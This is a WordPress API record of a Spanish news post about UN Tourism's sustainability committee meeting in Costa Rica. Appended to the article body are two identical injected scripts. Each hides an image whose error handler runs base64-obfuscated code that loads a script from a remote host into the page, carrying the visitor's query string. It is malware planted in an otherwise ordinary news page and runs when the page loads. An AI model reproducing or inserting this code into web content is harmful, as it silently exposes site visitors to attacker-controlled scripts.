{"id":4428,"date":"2024-09-24T20:54:09","date_gmt":"2024-09-24T23:54:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4428"},"modified":"2025-08-13T23:48:22","modified_gmt":"2025-08-14T02:48:22","slug":"el-comite-de-turismo-y-sostenibilidad-de-onu-turismo-se-reune-para-poner-de-relieve-el-crecimiento-turistico-responsable-y-beneficioso-para-la-naturaleza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4428","title":{"rendered":"El Comit\u00e9 de Turismo y Sostenibilidad de ONU Turismo se re\u00fane para poner de relieve el crecimiento tur\u00edstico responsable y beneficioso para la naturaleza"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c9aedd04cec89c2564d71fdb6da63a10\" style=\"background-color:#0225c4\"><em>El Comit\u00e9 dedic\u00f3 dos d\u00edas completos a debatir sobre los desaf\u00edos mundiales del turismo y la v\u00eda para lograr un desarrollo m\u00e1s sostenible, deseable y resiliente.<\/em><\/h3>\n\n\n\n<p>En la 19.\u00aa reuni\u00f3n del Comit\u00e9 de Turismo y Sostenibilidad (CTS) participaron los miembros electos del Comit\u00e9 procedentes de \u00c1frica, Asia y el Pac\u00edfico, Europa y las Am\u00e9ricas. Los 140 participantes, entre los que se encontraban los principales encargados de la formulaci\u00f3n de pol\u00edticas y varios expertos, reflexionaron en profundidad sobre los modos de equilibrar el crecimiento y la prosperidad con la inclusi\u00f3n y la sostenibilidad. Durante esos dos d\u00edas, tuvieron lugar sesiones tem\u00e1ticas especiales centradas en los principales problemas de sostenibilidad a los que se enfrenta el sector a medida que crece, con una previsi\u00f3n de 35.000 millones de excursionistas, visitantes internos e internacionales al a\u00f1o de aqu\u00ed a 2030.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"800\" height=\"600\" data-id=\"4430\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room.jpg\" alt=\"\" class=\"wp-image-4430\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room.jpg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Room-265x198.jpg 265w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"800\" height=\"600\" data-id=\"4431\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage.jpg\" alt=\"\" class=\"wp-image-4431\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage.jpg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Stage-265x198.jpg 265w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"800\" height=\"600\" data-id=\"4433\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee.jpg\" alt=\"\" class=\"wp-image-4433\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee.jpg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/CTS-Committee-265x198.jpg 265w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Zoritsa Urosevic, Directora Ejecutiva de ONU Turismo, hizo hincapi\u00e9 en la importancia de la reuni\u00f3n, y se\u00f1al\u00f3 que \u00abes la primera vez que el Comit\u00e9 se re\u00fane durante dos d\u00edas para reflexionar y debatir a fondo los temas estrat\u00e9gicos que definir\u00e1n la agenda internacional del sector, su sostenibilidad y su resiliencia en el futuro\u00bb.<\/p>\n\n\n\n<p>Por su parte, William Rodr\u00edguez, Ministro de Turismo de Costa Rica, a\u00f1adi\u00f3: \u00abEs un honor para Costa Rica recibir a los representantes del Comit\u00e9 de Turismo y Sostenibilidad de ONU Turismo. Nos enfrentamos al enorme reto de dirigir el debate sobre cuestiones sumamente importantes para el futuro ambiental, social y econ\u00f3mico de los Estados miembros, en un empe\u00f1o constante de que el turismo siga un modelo de gesti\u00f3n sostenible, inclusiva e innovadora, como el que promovemos en nuestro pa\u00eds\u00bb.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Con miras a actuaciones colectivas y uniformes<\/strong><strong><\/strong><\/h2>\n\n\n\n<p>El Comit\u00e9 de Turismo y Sostenibilidad centr\u00f3 su atenci\u00f3n en las dificultades relativas a la sostenibilidad a las que se enfrenta el turismo en la actualidad, bas\u00e1ndose en los conocimientos especializados de los expertos y de los miembros del Comit\u00e9, y bajo la direcci\u00f3n de Costa Rica. En los debates, que se estructuraron en cinco sesiones tem\u00e1ticas, se trataron los siguientes temas:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>El futuro del turismo<\/strong>: El Comit\u00e9 debati\u00f3 sobre el equilibrio cr\u00edtico entre crecimiento y sostenibilidad en el sector, haciendo hincapi\u00e9 en la importancia de fomentar el bienestar y la prosperidad de las comunidades locales. Las conversaciones se centraron en la forma de garantizar que el turismo sea el motor del crecimiento econ\u00f3mico y el enriquecimiento cultural al tiempo que se adapta a un mundo en constante evoluci\u00f3n.<\/li>\n\n\n\n<li><strong>La acci\u00f3n por el clima y la circularidad<\/strong>: En v\u00edsperas de la COP29, los participantes acogieron con satisfacci\u00f3n que ONU Turismo anunciara que el turismo se incluye por primera vez en el programa de acci\u00f3n de la Conferencia de las Partes. En los debates tambi\u00e9n se habl\u00f3 de los avances en la aplicaci\u00f3n de la Declaraci\u00f3n de Glasgow, como las mediciones y la mitigaci\u00f3n de las emisiones de gases de efecto invernadero relacionadas con el turismo, o la adaptaci\u00f3n a los efectos del cambio clim\u00e1tico, y se analizaron las medidas que podr\u00edan adoptarse en adelante.<\/li>\n\n\n\n<li><strong>Un turismo beneficioso para la naturaleza<\/strong>: Reafirmar el compromiso com\u00fan para aplicar pr\u00e1cticas beneficiosas para la naturaleza, incluida la restauraci\u00f3n y protecci\u00f3n de los ecosistemas, y centrar las pol\u00edticas tur\u00edsticas en la naturaleza. En la sesi\u00f3n se destacaron las oportunidades que ofrece el turismo positivo para la naturaleza, sobre todo para los destinos emergentes, en consonancia con el trabajo de la Alianza para el turismo positivo para la naturaleza (Nature Positive Tourism Alliance).<\/li>\n\n\n\n<li><strong>Declaraciones y certificaciones ecol\u00f3gicas<\/strong>: El Comit\u00e9 debati\u00f3 los problemas actuales y los importantes debates pol\u00edticos sobre los sistemas de certificaci\u00f3n, sobre todo a la luz de las directivas de la Comisi\u00f3n Europea. Se se\u00f1al\u00f3 la importancia de la uniformidad de las normas, sin dejar de tener en cuenta los contextos particulares de los distintos destinos.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Inspirarse en las buenas pr\u00e1cticas mundiales<\/strong><strong><\/strong><\/h2>\n\n\n\n<p>El CTS, al debatir la forma de encontrar el equilibrio entre el desarrollo de los destinos, el uso de los recursos, la diversidad biol\u00f3gica y la preservaci\u00f3n del patrimonio cultural, present\u00f3 varios ejemplos de soluciones positivas extra\u00eddos de diversos destinos. En las conversaciones sobre c\u00f3mo garantizar que el crecimiento del turismo se alinee con principios positivos para la naturaleza y la prosperidad inclusiva se hizo referencia al \u00edndice de progreso social de Costa Rica. El proceso que Fiji ha empleado para transponer la Ley de Cambio Clim\u00e1tico a sus pol\u00edticas y operaciones tur\u00edsticas fue uno de los ejemplos destacados. Tambi\u00e9n se present\u00f3 el caso de Islandia por su gesti\u00f3n inteligente del turismo, en la que se equilibra el crecimiento con el desarrollo sostenible a fin de reducir la huella ecol\u00f3gica del sector.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Llamamiento a la acci\u00f3n: Participaci\u00f3n en la COP16 y la COP29<\/strong><strong><\/strong><\/h2>\n\n\n\n<p>El Comit\u00e9 concluy\u00f3 las jornadas con un en\u00e9rgico llamamiento a la acci\u00f3n, en el que se insta a todas las naciones a participar para llevar estos debates cruciales al \u00e1mbito internacional. La COP 16, Conferencia de las Partes del Convenio sobre la Diversidad Biol\u00f3gica, y la COP29, Conferencia de las Partes en la Convenci\u00f3n Marco de las Naciones Unidas sobre el Cambio Clim\u00e1tico (CMNUCC) ser\u00e1n momentos determinantes para integrar las estrategias de turismo en la programaci\u00f3n general sobre el clima o el medio ambiente. Estas Conferencias ofrecen una oportunidad crucial para poner en consonancia las iniciativas del sector con los objetivos mundiales en materia de sostenibilidad.<\/p>\n\n\n\n<p>El Comit\u00e9 invita a los pa\u00edses a unirse a todos estos foros, a fin de garantizar que el turismo se sit\u00fae en una posici\u00f3n clave para definir un futuro sostenible, inclusivo y resiliente para el planeta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"696\" height=\"113\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Captura-web_24-9-2024_204612_www.unwto_.org_.jpeg\" alt=\"\" class=\"wp-image-4429\" style=\"width:611px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Captura-web_24-9-2024_204612_www.unwto_.org_.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/Captura-web_24-9-2024_204612_www.unwto_.org_-300x49.jpeg 300w\" sizes=\"(max-width: 696px) 100vw, 696px\" \/><figcaption class=\"wp-element-caption\">Fuente: <\/figcaption><\/figure><\/div><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Comit\u00e9 dedic\u00f3 dos d\u00edas completos a debatir sobre los desaf\u00edos mundiales del turismo y la v\u00eda para lograr un desarrollo m\u00e1s sostenible, deseable y resiliente. En la 19.\u00aa reuni\u00f3n del Comit\u00e9 de Turismo y Sostenibilidad (CTS) participaron los miembros electos del Comit\u00e9 procedentes de \u00c1frica, Asia y el Pac\u00edfico, Europa y las Am\u00e9ricas. Los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4435,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[43,22],"tags":[],"class_list":{"0":"post-4428","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ambiente-naturaleza","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4428"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4428"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4428\/revisions"}],"predecessor-version":[{"id":6678,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4428\/revisions\/6678"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4435"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}